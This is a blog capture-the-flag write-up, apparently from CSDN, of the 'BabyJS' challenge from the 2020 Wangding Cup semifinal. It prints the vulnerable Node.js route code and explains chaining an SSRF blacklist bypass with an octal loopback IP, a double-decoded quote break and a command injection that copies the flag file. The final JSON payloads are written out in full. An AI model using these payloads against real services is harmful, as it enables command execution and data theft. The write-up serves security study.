[网鼎杯 2020 半决赛]BabyJS

于 2021-09-13 21:03:44 发布
阅读量555 收藏
点赞数
分类专栏: wp 文章标签: node.js
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/woshilnp/article/details/120275525
版权

[网鼎杯 2020 半决赛]BabyJS

知识点:

SSRF绕过

node.js代码审计

解题:

关键代码如下:

var express = require('express');
var config = require('../config');
var url=require('url');
var child_process=require('child_process');
var fs=require('fs');
var request=require('request');
var router = express.Router();


var blacklist=['127.0.0.1.xip.io','::ffff:127.0.0.1','127.0.0.1','0','localhost','0.0.0.0','[::1]','::1'];

router.get('/', function(req, res, next) {
    res.json({});
});

router.get('/debug', function(req, res, next) {
    console.log(req.ip);
    if(blacklist.indexOf(req.ip)!=-1){
        console.log('res');
	var u=req.query.url.replace(/[\"\']/ig,'');
	console.log(url.parse(u).href);
	let log=`echo  '${url.parse(u).href}'>>/tmp/log`;
	console.log(log);
	child_process.exec(log);
	res.json({data:fs.readFileSync('/tmp/log').toString()});
    }else{
        res.json({});
    }
});


router.post('/debug', function(req, res, next) {
    console.log(req.body);
    if(req.body.url !== undefined) {
        var u = req.body.url;
	var urlObject=url.parse(u);
	if(blacklist.indexOf(urlObject.hostname) == -1){
		var dest=urlObject.href;
		request(dest,(err,result,body)=>{
			res.json(body);
		})
	}
	else{
		res.json([]);
	}
	}
});

module.exports = router;

在这里插入图片描述

存在代码注入漏洞,对 /debug 路径进行GET请求时,它会先判断访问 ip 是否在黑名单内,如果在就读取 GET 中的 url 参数,再把单双引号过滤了,再使用url.parse去解析。把解析后的 url 拼接到 shell 命令中执行。然后返回/tmp/log文件中的内容。

后面还存在通过POST方式请求 /debug 路径,程序会先判断是否提交了参数,如果提交了该参数则会用url.parse解析,然后判断其中的主机名字段是否在blacklist中,如果主机名没有被 ban 掉,则去使用GET方法请求url参数中所提交的 url ,返回请求的内容。

因为我们想绕过白名单,进入GET请求的 /debug ,所以我们只能POST /debug 让其SSRF去GET请求自己的 /debug,为什么这里要使用SSRF呢,就是因为GET的时候是判断访问 ip ,而POST的时候是重POST的 body 进行黑名单验证的

黑名单绕过方法:

https://www.secpulse.com/archives/65832.html

{"url":"http://0177.0.0.1:3000/debug?url="}

下一步是闭合引号,这就和 nodejs 的 url 库的具体实现相关了。因此我们想到了进行二次编码绕过,因为web服务器会先解一次码

但是这就需要有二次解码的地方,就需要知道 nodejs 二次解码的地方:

https://github.com/nodejs/node/blob/master/lib/url.js

在这里插入图片描述

意思是@前,也就是URL中表示用户名和密码的字段会被二次解码,所以可以构造如下payload即可闭合引号:

{"url":"http://0177.0.0.1:3000/debug?url=http://%2527@xx"}

最后我们就想把 flag 传入 /tmp/log 中,直接使用 cp 命令即可:

{"url":"http://0177.0.0.1:3000/debug?url=http://a%2527@a;cp$IFS/flag$IFS/tmp/log%00"}

%00 是为了截取后面代码

w0s1np
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020网鼎杯网络安全夺旗赛半决赛题目源代码
11-29
2020网鼎杯网络安全夺旗赛半决赛题目源代码。 2020网鼎杯,网络安全夺旗赛,CTF, AWD PLUS, 源代码,题目复现,渗透复现。
2020网鼎杯线下半决赛web_babyJS write_up
KALI linux新版折腾笔记
12-07 1308
题目描述 nodejs的url库真好用 攻击分析 直接访问 一个空的json,啥也没有。 源码 真正的web逻辑在routes\index.js下: var express = require('express'); var config = require('../config'); var url=require('url'); var child_process=require('child_process'); var fs=require('fs'); var request=require(
大鱼吃小鱼游戏-baby.js
zendan的博客
11-13 627
var babyObj = function() { this.x; this.y; this.babyAngle; this.babyEye = new Image(); this.babyBody = new Image(); this.babyTail = new Image(); this.babyTailTimer = 0; thi
babyJs:用于简化和优化现代 Web 应用程序中常见任务的微型框架
07-10
宝贝Js 用于简化和优化现代 Web 应用程序中常见任务的微型框架
网鼎杯2020半决赛awdplus题目
12-07
"网鼎杯2020半决赛awdplus题目"是一个针对网络安全竞赛的专题,主要涉及的是Pwn(破解)和Web(网页安全)两类挑战。这类比赛通常旨在测试参赛者的逆向工程、代码审计、漏洞利用以及网络攻防技能。下面我们将详细...
网鼎杯 白虎组.zip
05-15
2020年第二届 网鼎杯网络安全大赛白虎组 线下赛 真题 pwn reserve web misc 按照“网鼎杯”大赛两年一届的举办原则,第二届“网鼎杯”大赛5月开赛,6月19日至21日在广东省深圳市举办线下半决赛、总决赛和颁奖典礼。
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件
09-19
2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络安全大赛(青龙组)部分题目附件 2022年第三届“网鼎杯”网络...
网鼎杯writeup-护网先锋1
08-04
3、得到 flag,截图如下图所示: 1、查看源代码可以发现存在代码泄露,代码如下: 2、在 get 中使用.可以绕过第一个判断 3、使用.@c7f.zhuqu
出题人的RP值
无限迭代中......
01-18 263
https://ac.nowcoder.com/acm/contest/358/A 题解:显然排个序然后从小到大地和与自己大的数取平均数就好了   /* *@Author: STZG *@Language: C++ */ #include <bits/stdc++.h> #include<iostream> #include<algorithm> #i...
网鼎杯2020.txt
05-24
网鼎杯2020白虎组部分题目链接:https://pan.baidu.com/s/1_8iThteUQKj2jBg95nkzEQ 提取码:inrl
http://syy7.com/a/25.php,vue_element/vue_elementui.sql at 3ffdcb477ce3fbbc24cf1a4d7e3481a187023a02 ·...
热门推荐
weixin_34064233的博客
04-13 94万+
INSERT INTO `user_tb` VALUES ('1', '女', 'burtyang', 'C041580E1C6192B6084E03CE76D5C05C', '18', null, 'data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAwICQoJBwwKCQoNDAwOER0TERAQESMZGxUdKiUsKykl...
【WriteUp】网鼎杯2020线下半决赛两道WEB
weixin_42337765的博客
11-29 8601
网鼎杯2020线下半决赛两道WEB题WriteUp 网鼎杯2020线下半决赛两道WEB题WriteUp 第一次参与网鼎杯线下赛,五道题3道PWN、两道WEB(PHP),下午又加了一道web(nodejs)。 先说下赛制,网鼎杯赛制叫做AWD PLUS,应该是全国唯一采用这个赛制的比赛。名字叫做AWD,实际这个赛制队伍之间不需要也不允许相互打。每个队伍每个题目有一个GameBox,提供下载源代码包,攻击和修复代码漏洞就可以得分。与一般AWD不同的是,网鼎杯赛制不需要准备不死马/通防脚本等,更加偏重于代码审计、
react consumer provider 的学习
黄彪博客
08-10 3243
文章参考 react Consumer Provider 问题来源 最近在看一些项目的时候,有Provider 和 Consumer属性,不了解其中的意思,专门花时间了解了一下 使用场景描述 跨几个组件传递值或者方法的时候, 如果依赖父子组件传值, 那势必会很麻烦。 好在react提供了Provider 和 Consumer 类似于redux的应用场景 如何创建 Provider 和 Co...
Tuna QT资料库
KALI linux新版折腾笔记
05-27 260
https://mirrors.tuna.tsinghua.edu.cn/qt/online/qtsdkrepository/windows_x86/root/qt/
MAC OS中配置opencv环境并用IntelliJ建立工程(JAVA)
lee_JJ的专栏
12-28 13万+
因为毕设项目需要用到openCV,所以这两天花了些时间配环境。中间遇到了一些问题,现在均已解决,希望我的经验可以帮到之后需要在MAC下使用opencv的人。 安装openCV: 首先安装homebrew,因为我之前已经安装过,所以可以直接使用。没有安装的人,请自行搜索安装方法,很简单。 之后,打开命令行  1. sudo brew update(注意,如果之前已经安装过brew的人,请先更
java 如何将base64 转成图片并保存,返回地址入库
小青年 爱交流 爱分享
06-11 10万+
目标:将前端传进来的base64 转换成图片,并保存到指定目录,然后将目录存入数据库.这个实际项目中还是挺常见的. 代码如下; 先掉base64ToByte(); 在调用 filePath() 代码可以直接使用(优化靠自己) //先将base64转成字节数在 public static byte[] base64ToByte(String imageBase64) { byte[] b = null; Base64.Decoder decoder = Base64.getDecoder...
写一个篮球赛半决赛简讯
最新发布
04-15
当然,让我来为您写一篇篮球赛半决赛简讯。比赛在今晚充满激情的开幕式后开始。两支球队在球场上表现出色,比赛紧张刺激。在第四节前几分钟内,两队分数相差不大。但是,在接下来的几分钟内,一支球队将领先优势扩大...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值